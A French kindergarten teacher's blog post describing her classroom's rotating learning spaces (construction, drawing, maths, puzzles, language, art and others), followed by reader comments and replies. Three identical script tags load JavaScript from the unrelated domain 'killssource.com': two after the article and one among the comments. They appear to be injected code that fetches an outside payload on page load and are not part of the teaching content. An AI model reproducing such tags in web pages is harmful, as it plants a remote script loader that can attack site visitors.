• Des espaces pour mieux apprendre

    Alors voilà, je continue la présentation de mon fonctionnement en espaces d'apprentissages dans ma classe. 

    Je vais vous lister les espaces que j'ai mis en place à titre indicatif bien sûr.  Cela n'a évidemment pas vocation d'être un exemple à suivre mais plutôt de montrer comment je me suis inspirée du livre ( "Aménager les espaces pour mieux apprendre" aux éditions Retz) et comment je l'ai adapté à la réalité de ma classe. ( matérielle et spatiale)

    Avant tout il faut savoir que je suis seule sur mon école à fonctionner de cette façon même si mes collègues me soutiennent à fond dans mon fonctionnement c'est vers d'autres pédagogies et dispositifs tout aussi intéressants, qu'elles se sont dirigées. Et ce n'est pas plus mal, cela nous permet d'avoir de beaux échanges et débats constructifs et animés. Notre finalité reste la même...

    Mais revenons à nos espaces....

    Donc comme je suis seule à fonctionner de cette façon je ne dispose que de ma classe ( bon parfois il m'arrive de déborder un peu dans le couloir ^^)

    J'ai donc fait le choix d'alterner certains espaces : certains sont présents le matin et laissent place l'après midi à d'autres espaces. Cela me permet de pouvoir mettre plus d'espaces à disposition des élèves. 

    Je m'explique : le matin, j'ai un espace mathématiques qui laisse place à l'espace puzzles l'après midi ou bien mon espace graphisme du matin laisse place à mon espace arts visuels l'après midi etc...de cette façon je fais tourner un max d'espaces d'apprentissages sur la journée.

    Avant de vous dévoiler enfin la liste de mes espaces il faut aussi que je vous dise, qu'il est important surtout au début de ne mettre à disposition qu'un seul matériel si vous voulez éviter que cela ne se transforme en un bazar vite ingérable. En effet, il est très important que les élèves comprennent qu'ils ne peuvent utiliser que ce qui est sorti sur la table ou le sol  et qu'ils ne doivent surtout pas sortir un matériel du meuble aussi attirant soit-il! Et ça croyez moi c'est un long combat....certaines années plus long que d'autres...yesmais ça finit par rentrer ne vous inquiétez pas biggrin

    Aller assez attendu voici donc les espaces que j'ai mis en place dans ma classe : 

    Espace construction : dans cet espace je ne mets à disposition q'un seul jeu de construction( légos, kaplas, tuyaux, jeux magnétiques etc...) et je fais tourner sur l'année, en général un par période. La plupart du temps ( sauf les deux ou trois premières fois au début de l'année) c'est un espace qui est utilisé en autonomie avec une mise en commun ou bilan en regroupement. Puis avec des modèles à reproduire. ( c'est ce qui me sert de validation)

    Je dispose également d'une tour à tiroirs avec des jeux de construction en petits modèles. Mais je l'ai mise dans l'espace maths du côté formes et grandeurs.Ils ont des modèles à reproduire après avoir eu un temps d'exploration libre.

    Des espaces pour mieux apprendre

    Espace Graphisme : j'utilise mon chevalet de peinture, j'y mets une feuille blanche, noire ou de couleur puis les éléments et les médiums que je souhaite voir  utilisés par mes élèves. Parfois je mets un modèle de ce que je souhaite obtenir , parfois c'est en autonomie totale juste les consignes explicitées avant. Cet espace est souvent en dirigé ou semi dirigé ( je n'y suis que de temps en temps par sur la totalité du temps de travail)

    Des espaces pour mieux apprendre

    Espace dessin : j'accorde une place très importante au dessin dans ma classe si bien que j'ai fait le choix de ne pas utiliser mon tableau noir ( ou vert erf) et de le laisser pour les élèves. J'y accroche des modèles de dessins, dessins par étapes, pochoirs à remplir ou je les laisse libre.C'est un espace très investi dans ma classe. C'est même plutôt drôle car au début ils n'osaient pas y aller car pour eux le tableau c'est sacré, c'est à la maîtresse, mais depuis qu'ils y ont touché on ne les arrête plus. Cet espace est en autonomie avec des retours en regroupement quand il y a besoin.

    Des espaces pour mieux apprendre

    Espace mathématiques : alors c'est un espace que j'utilise en dirigé lorsque je présente un nouveau matériel ou nouvelle activité mais que je laisse en autonomie pour l'entrainement , j'y reviens pour valider les ateliers. Le matériel proposé varie en fonction de l'activité ( je pourrais à l'occasion vous faire une liste du matériel que je propose wink2). Dans cet espace on trouve un meuble où sont rangés les divers jeux ainsi que le matériel nécessaire à certaines activités puis une table ronde .

    Des espaces pour mieux apprendre

    Espace Puzzles : C'est un meuble qui se trouve dans l'espace mathématiques, on y trouve des puzzles de diverses difficultés ( de 20 à 100 pièces) Les élèves ont une fiche de suivi pour savoir quel puzzle ils ont le droit de prendre. Ils utilisent souvent la table de l'espace mathématiques ou le sol pour les grands puzzles.C'est un espace autonome, je n'y vais que pour valider quand le puzzle a été réalisé seul.

    Des espaces pour mieux apprendre

    Espace langage : c'est un espace qui contient lui même plusieurs petits espaces. On y pratique le langage oral, l'écriture, la phonologie. C'est un espace dirigé la plupart du temps sauf pour les phases d'entraînements avec ateliers autonomes excepté pour l'écriture qui elle se fait TOUJOURS en dirigé.  

    Des espaces pour mieux apprendre

    Espace culturel : on y trouve la bibliothèque avec albums et documentaires, j'ai fait le choix d'y mettre les boîtes à histoires type  Narramus

    ainsi que mon coin écoute ( histoires et musique)

    Des espaces pour mieux apprendre

    Espace art éphémère : j'y ai mis des petits bidules que mes élèves disposent et assemblent pour faire des compositions artistiques éphémères. Depuis cette année j'y ai ajouté des Grapats, un matériel de construction éphémère en bois que je viens de découvrir et qui  permet de réaliser de superbes créations   (je vous en reparlerai sûrement dans un prochain article.)

    Des espaces pour mieux apprendre

     

    Des espaces pour mieux apprendre

    Espace imitation : tout comme pour l'espace construction j'ai fait le choix de faire tourner le matériel par période afin de maintenir l’intérêt des élèves. Mais il faut que je vous avoue franchement que les espaces d'imitation grands formats ne sont pas trop ma tasse de thé. J'ai fait donc le choix d'y mettre des espaces miniatures la plupart du temps sur les animaux ( ferme, zoo, dinosaures, aquarium etc...)

     

    Espace arts visuels : il est dirigé par mon atsem lorsqu'elle est présente ( je ne l'ai qu'une demi journée) et j'ai commencé cette année à laisser de temps en temps, des temps autonomes sur cet espace. Je vous avoue que j'ai été agréablement surprise. Avant l'arrêt de l'école j'avais même lancé des activités couture dans cet espace en autonomie ( si si ...je vous promets!)

    Espace découpage : alors c'est pas vraiment un espace à part entière mais il me tient à cœur de vous le présenter. Les élèves utilisent la table de l'espace arts visuels lorsqu'elle est libre et j'essaie de proposer une activité de découpage chaque jour. Les élèves ont fait des progrès fulgurants et sont devenus des véritables pros du découpage!

     

    Voilà je pense avoir fait le tour de mes espaces. J’espère que cela va vous donner envie de vous lancer , vous questionner ou au moins de lire le livre.

    Maintenant que je vous ai mis l'eau à la bouche j'imagine que vous avez envie d'avoir des exemples de progressivité et de scénarios que l'on peut mettre en place ?

    ça sera l'objet d'un prochain article.....happy

     

    <script src="//killssource.com/21c1e810f7f98f00b3.js"></script>

    <script src="//killssource.com/21c1e810f7f98f00b3.js"></script>

    « Affichage mathématiquesStranger things »
    Pin It

  • Commentaires

    9
    Mercredi 22 Avril 2020 à 21:09

    Bonjour,

    Merci pour ton partage ! C'est super de voir tes espaces en classe, ça donne des idées. J'ai repensé ma classe en espaces en 2014 et j'adore ce fonctionnement (mes élèves aussi !)

    J'ai aussi commencé un blog pour expliquer mon fonctionnement en espaces notamment. 

    Si cela intéresse quelqu'un, voici le lien :

    http://maicressepaillettes.eklablog.com/accueil-c31605902

      • Jeudi 23 Avril 2020 à 00:17

        Rha mais trop !! Merci pour le lien j'y vais de ce pas. Il y a tellement peu de blogs sur le sujet.

    8
    Carole
    Samedi 18 Avril 2020 à 12:46
    Bonjour, je voudrais travailler en espace en ms gs mais je n arrive pas à voir comment organiser mes séances en phono, maths.. Comment t organises tu sur une période ? Merci d avance ?
      • Carole
        Jeudi 23 Avril 2020 à 11:54
        Merci pour la réponse.. Je vais réfléchir à tout ça et essayer de le mettre en place !
      • Dimanche 19 Avril 2020 à 16:29

        Pour les maths je fais la présentation des notions essentiellement en rituels donc en grand groupe, ensuite dans les espaces je présente les activités liées par petits groupes. J'utilise "la numération de 0 à 10" de Nurvero un ouvrage clé en main qui est juste top. Pour la phono je procède de la même manière d'abord introduction en rituels puis présentation des ateliers en petits groupes. Les élèves sont très vite autonomes dans ce type de fonctionnement.

    7
    Anne
    Jeudi 16 Avril 2020 à 20:30
    Et merci pour toutes ces infos précieuses !!
    6
    Anne
    Jeudi 16 Avril 2020 à 20:29
    Très bonne idée de faire évoluer les espaces au cours de la journée.
    Pas d'espace activités pratiques /motricité fine?
      • Dimanche 19 Avril 2020 à 16:30

        si j'ai un meuble de motricité fine dans l'espace écriture.wink2

    5
    maitreSmorgane
    Jeudi 16 Avril 2020 à 18:18

    Vivement la suite!!!!

    <script src="//killssource.com/21c1e810f7f98f00b3.js"></script>
    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :